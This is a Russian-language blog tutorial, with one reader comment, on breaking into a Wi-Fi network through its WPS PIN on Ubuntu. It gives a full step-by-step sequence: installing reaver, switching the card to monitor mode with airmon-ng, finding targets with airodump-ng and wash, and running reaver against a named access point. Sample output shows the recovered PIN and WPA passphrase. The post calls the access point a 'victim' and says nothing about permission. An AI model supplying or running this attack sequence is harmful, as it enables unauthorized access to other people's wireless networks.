Целью протокола WPS(Wi-Fi Protected Setup) является упрощение процесса настройки беспроводной сети. Суть технологии и уязвимости отлично расписана в журнале Хакер, Март (03) 158, а также на HabraHabr в следующих статьях тут и тут. В этой же статье я опишу как все это проделать в Ubuntu 10.04 (12.04).
Для данных целей имеем:
- Ноутбук Asus EeePC 1005P c Ubuntu 10.04 (12.04 собственно LTS оно лучше) на борту
- Wi-Fi точку (наша жертва)
- Руки, желательно две
Готовимся. Ставим необходимые пакеты и reaver (берем тут)
sudo apt-get install libpcap-dev sudo apt-get install libsqlite3-0 libsqlite3-dev wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz tar -xzvf reaver-1.4.tar.gz cd reaver-1.4/src ./configure make sudo make install
В начале смотрим на наши беспроводные интерфейсы и переводим с помощью airmon-ng в режим мониторинга (установка aircrack-ng описана тут)
1 2 | iwconfig
sudo airmon-ng start wlan0
|
Виртуальный интерфейс mon0 создан, теперь посмотрим на сети вокруг нас:
1 | sudo airodump-ng mon0
|
Наша цель сеть HOME. Проверяем работает ли WPS на ней:
1 | sudo wash -i mon0 |
Наша сеть HOME появилась, следовательно WPS на ней присутствует. Ломаем!
1 | sudo reaver -i mon0 -b B8:A3:86:19:FB:56 -vv |
Вывод будет примерно следующий:
1 2 3 4 5 6 7 8 9 10 11 12 13 | Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from B8:A3:86:19:FB:56 [+] Associated with B8:A3:86:19:FB:56 (ESSID: HOME) [+] Trying pin 63979978 #Ждем когда пару часов, когда сутки... [+] Trying pin 64637129 [+] Key cracked in 13654 seconds [+] WPS PIN: '64637129' [+] WPA PSK: '100VfrfrGfkbJnUhbggf!' [+] AP SSID: 'HOME' |
Собственно [+] WPS PIN: ’64637129′ подобранный WPS ключ, [+] WPA PSK: ’100VfrfrGfkbJnUhbggf!’ ключ к сети.
Взлом WPA и WEP описан в этой статье
товарищ забыл ссылку на первоисточник http://chelaxe.ru/?p=580
ОтветитьУдалить